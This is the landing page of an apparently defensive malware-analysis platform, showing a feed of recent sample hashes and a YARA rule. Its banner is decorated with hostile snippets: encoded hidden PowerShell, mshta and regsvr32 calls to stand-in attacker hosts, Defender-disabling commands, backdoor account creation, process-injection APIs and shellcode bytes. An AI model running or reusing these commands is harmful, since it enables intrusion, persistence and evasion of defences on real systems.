ZIP · DOCX · XLSX
OLE · CFB · Container
VBA Macro · P-Code
Base64 · XOR · Obfusc.
Shellcode · Loader
// MALICIOUS PAYLOAD
@echo off
cmd /c powershell -nop -w hidden
-enc JABzAD0ATgBlAHcALQBP...
certutil -decode drop.b64 out.exe
regsvr32 /s /n /u /i:http://c2.re
mshta http://evil.re/stage.hta
rule Malware_Dropper {
strings:
$mz = { 4D 5A ?? ?? }
$ps = "powershell" nocase
$b64 = /[A-Za-z0-9+\/]{40,}/
condition: all of them
}
50 4B 03 04 14 00 06 00
// ZIP magic — outer container
Set sh=CreateObject("WScript.Shell")
sh.Run "powershell -ep bypass",0,True
Set x=CreateObject("MSXML2.XMLHTTP")
x.Open "GET", strUrl, False
wscript //B //NoLogo drop.vbs
ShellExecuteA
WinExec
CreateProcessA
InternetOpenA
URLDownloadToFile
Function Deobf(s As String)
For i = 1 To Len(s)
r = r & Chr(Asc(Mid(s,i,1))
Xor &H41)
Next i : Deobf = r
End Function
Invoke-Expression $decoded
[Assembly]::Load($buf).EntryPoint
Add-MpPreference
-ExclusionPath
$env:APPDATA
Set-MpPreference
-DisableRealtime $true
...\CurrentVersion\Run
$b=[Convert]::FromBase64String(
"JABzAD0ATgBlAHcALQBPAGIA")
%COMSPEC:~0,1%%COMSPEC:~9,1%
Chr(112)&Chr(111)&Chr(119)
agBlAGMAdAAoACcAaAB0AHQA
cAB0ADoALwAvAGUAdgBpAGwA
cgBlAC4AcgBlAC8AcABhAHkA
XOR key: 0x41
ROT13 + base64
RC4 stream cipher
net user backdoor
P@ss1234! /add
schtasks /create
/sc minute /mo 5
\x48\x31\xC0\x48\xB8\x63\x61
\x6C\x63\x00\x50\xFF\xD0\x90
VirtualAllocEx
WriteProcessMemory
CreateRemoteThread
NtUnmapViewOfSection
GetProcAddress
LoadLibraryA
4D 5A 90 00 03 00 FF FF
0xfc,0x48,0x83,0xe4,0xf0,0xe8
0xcc,0x00,0x00,0x00,0x41,0x51
0x41,0x50,0x52,0x51,0x56,0x48
invoke-webrequest -uri $c2
-outfile $env:TEMP\svc32.exe
Start-Process -WindowStyle Hidden
AAAA%p%p%p%p%x.%x.%x
ZwQueryInformationProcess
// THREAT INTELLIGENCE PLATFORM
Unlock the future of
Extended Malware
Analysis.
Advanced static & structural analysis for cybersecurity experts.
200+
Formats
YARA
Rule Engine
AI
Powered
// Recent threats
f1c8fcd0a068217c9d35ce071980d9a2
AutoIt Compiled Script
11 minutes ago
ba425803971bbd612fab8d127f940623
Portable Executable file
an hour ago
25e1a98bf6b4ac5596ee8c805f80aea0
Portable Executable file
4 hours ago
RevengeRat
191cb0b563270b33b7a53f9ae3007708
Portable Executable file
7 hours ago
5d1d3b4bd5113a2ec1e089b212969532
ZIP archive
15 hours ago
0efef11061d189098e3ba4b00f6fd99b
Portable Executable file
16 hours ago
0c4df7d860e754906eb8abe8ebcf2ebf
PowerShell Script
yesterday
3f9d90923d2d9bba0de4e375d8f3cd11
AutoIt Compiled Script
2 days ago
5fbeea9f24c9314ef0fdc36245f22054
Portable Executable file
2 days ago
AsyncRAT
C2: wholesaleshoes.sa.com
c55d696ea1a03dca903a156a0524c0d2
AutoIt Compiled Script
2 days ago
483d1f9a9335df2ba017cc8e97de290f
VBScript file
2 days ago
97add08f1d5f455c9622da5b5cbefdd7
VBScript file
2 days ago
31987649be9cd6419c52729b9b635cab
VBScript file
2 days ago
78f5298c2ec53e85c2f8193ece46e663
PowerShell Script
2 days ago
f4669c932294aa2c8303b589bc3a5768
PowerShell Script
2 days ago
1c2270353e7463f108274bf46f15432a
PowerShell Script
2 days ago
919d26f0f845dbfa79bcbad25afd7f10
Portable Executable file
2 days ago
37872e46797e86469ac373f572c4b05e
Portable Executable file
2 days ago
92f3067f8f1d94cca862777828272ee3
AutoIt Compiled Script
2 days ago
38d66258740611f96675c49c6bb9f27d
AutoIt Compiled Script
2 days ago
Connect & explore more →
Sign in
New user?
Create an account →
Email address
Continue
or
Continue with Google
Continue with Microsoft
MALVA.RE · SECURE ACCESS · v2
An error has occurred. This application may no longer respond until reloaded.
Reload
🗙